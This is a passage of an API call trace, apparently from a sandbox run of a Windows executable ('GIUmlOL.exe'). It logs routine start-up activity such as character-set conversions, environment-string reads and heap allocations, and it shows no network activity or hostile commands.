¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0202.194] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0202.194] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0202.194] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0202.194] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0202.194] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0202.194] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0202.194] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1000) returned 0x497790 [0202.195] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0202.195] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0202.195] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0202.195] AreFileApisANSI () returned 1 [0202.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0202.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0202.195] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xca) returned 0x484400 [0202.195] GetEnvironmentStringsW () returned 0x4987a0* [0202.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0202.196] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x4e6) returned 0x499180 [0202.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x499180, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0202.196] FreeEnvironmentStringsW (penv=0x4987a0) returned 1 [0202.196] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x118) returned 0x489a70 [0202.196] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1f) returned 0x48b220 [0202.196] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2e) returned 0x48e240 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x31) returned 0x48e280 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c) returned 0x491080 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x31) returned 0x48e340 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x14) returned 0x4897c0 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x24) returned 0x48ae30 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xd) returned 0x483fb0 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1d) returned 0x48b100 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x31) returned 0x48e640 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x15) returned 0x484090 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x17) returned 0x4825f0 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xe) returned 0x489490 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x69) returned 0x4820d0 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3e) returned 0x490770 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1d) returned 0x48b190 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x48) returned 0x490810 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x12) returned 0x4894b0 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x18) returned 0x482150 [0202.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1b) returned 0x48b280 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1e) returned 0x48b340 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x29) returned 0x48e2c0 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1e) returned 0x48b0a0 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x6b) returned 0x484b40 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x17) returned 0x482170 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xf) returned 0x48c310 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x16) returned 0x48c330 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2a) returned 0x48e300 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x29) returned 0x48e3c0 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x12) returned 0x484810 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x21) returned 0x48b070 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x16) returned 0x4999c0 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x22) returned 0x48b010 [0202.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x12) returned 0x499700 [0202.198] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499180 | out: hHeap=0x480000) returned 1 [0202.199] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xa3a7) returned 0x499a80 [0202.207] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x20) returned 0x48b2b0 [0202.207] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xa3a7) returned 0x4a3e30 [0202.208] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499a80 | out: hHeap=0x480000) returned 1 [0202.208] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xfef7) returned 0x4ae1e0 [0202.212] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x40) returned 0x490f40 [0202.212] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xfef7) returned 0x4be0e0 [0202.214] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48b2b0 | out: hHeap=0x480000) returned 1 [0202.214] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ae1e0 | out: hHeap=0x480000) returned 1 [0202.215] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x450) returned 0x4987a0 [0202.216] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x450) returned 0x498c00 [0202.216] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.216] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1ea7) returned 0x4cdfe0 [0202.216] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xf40) returned 0x499a80 [0202.217] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x7a0) returned 0x49a9d0 [0202.218] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.218] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499a80 | out: hHeap=0x480000) returned 1 [0202.218] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xbf0) returned 0x499a80 [0202.218] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x498c00 | out: hHeap=0x480000) returned 1 [0202.218] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49a9d0 | out: hHeap=0x480000) returned 1 [0202.218] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x640) returned 0x4987a0 [0202.218] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1247) returned 0x4cdfe0 [0202.218] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499a80 | out: hHeap=0x480000) returned 1 [0202.218] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.218] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x520) returned 0x4cf230 [0202.218] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1b56) returned 0x499a80 [0202.219] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.219] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cf230 | out: hHeap=0x480000) returned 1 [0202.219] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8a0) returned 0x4987a0 [0202.219] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x28ed) returned 0x49b5e0 [0202.219] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499a80 | out: hHeap=0x480000) returned 1 [0202.219] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.219] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x550) returned 0x4987a0 [0202.219] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.220] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2537) returned 0x49dee0 [0202.220] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x12b7) returned 0x499a80 [0202.221] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x950) returned 0x4987a0 [0202.221] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49dee0 | out: hHeap=0x480000) returned 1 [0202.222] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499a80 | out: hHeap=0x480000) returned 1 [0202.222] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x3d4f) returned 0x49dee0 [0202.222] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49b5e0 | out: hHeap=0x480000) returned 1 [0202.222] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.222] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2377) returned 0x499a80 [0202.222] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x11d7) returned 0x4cdfe0 [0202.223] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8e0) returned 0x4cf1c0 [0202.223] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499a80 | out: hHeap=0x480000) returned 1 [0202.223] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.223] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cf1c0 | out: hHeap=0x480000) returned 1 [0202.223] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x5b0) returned 0x4987a0 [0202.223] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.223] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x640) returned 0x4987a0 [0202.223] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x5be2) returned 0x4ae1e0 [0202.224] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49dee0 | out: hHeap=0x480000) returned 1 [0202.224] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.224] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x890) returned 0x4987a0 [0202.224] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.224] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xac0) returned 0x4987a0 [0202.224] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.225] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x20) returned 0x48b490 [0202.225] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x960) returned 0x4987a0 [0202.225] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x960) returned 0x4cdfe0 [0202.225] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.225] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x460) returned 0x4987a0 [0202.503] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xe0f) returned 0x4ce950 [0202.503] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.503] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.503] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1c17) returned 0x4b3dd0 [0202.503] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xe00) returned 0x4987a0 [0202.503] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x700) returned 0x4cf770 [0202.503] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b3dd0 | out: hHeap=0x480000) returned 1 [0202.504] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.504] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x153d) returned 0x4b3dd0 [0202.504] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ce950 | out: hHeap=0x480000) returned 1 [0202.504] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cf770 | out: hHeap=0x480000) returned 1 [0202.504] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2277) returned 0x4b5320 [0202.504] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1157) returned 0x4cdfe0 [0202.504] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8a0) returned 0x4cf140 [0202.505] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b5320 | out: hHeap=0x480000) returned 1 [0202.505] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.505] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1fc7) returned 0x4b5320 [0202.505] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b3dd0 | out: hHeap=0x480000) returned 1 [0202.505] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cf140 | out: hHeap=0x480000) returned 1 [0202.505] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1657) returned 0x4cdfe0 [0202.505] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xb20) returned 0x4987a0 [0202.505] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x590) returned 0x4cf640 [0202.505] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.505] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.505] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2f96) returned 0x4b72f0 [0202.506] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b5320 | out: hHeap=0x480000) returned 1 [0202.506] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cf640 | out: hHeap=0x480000) returned 1 [0202.506] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2b47) returned 0x4b3dd0 [0202.506] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x15b7) returned 0x4cdfe0 [0202.506] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xad0) returned 0x4987a0 [0202.506] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b3dd0 | out: hHeap=0x480000) returned 1 [0202.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.507] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2697) returned 0x4b3dd0 [0202.507] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1367) returned 0x4cdfe0 [0202.507] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9a0) returned 0x4cf350 [0202.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b3dd0 | out: hHeap=0x480000) returned 1 [0202.508] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.508] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x474d) returned 0x499a80 [0202.508] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b72f0 | out: hHeap=0x480000) returned 1 [0202.508] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cf350 | out: hHeap=0x480000) returned 1 [0202.508] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x920) returned 0x4987a0 [0202.508] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.508] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1b47) returned 0x4cdfe0 [0202.508] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xd90) returned 0x4987a0 [0202.508] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x6d0) returned 0x49e1e0 [0202.508] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.508] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.508] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49e1e0 | out: hHeap=0x480000) returned 1 [0202.508] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x5d0) returned 0x4987a0 [0202.508] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x6adf) returned 0x4b3dd0 [0202.508] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499a80 | out: hHeap=0x480000) returned 1 [0202.508] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.508] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1887) returned 0x4cdfe0 [0202.508] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xc30) returned 0x4987a0 [0202.509] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x620) returned 0x4cf870 [0202.509] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.509] HeapFree (in: 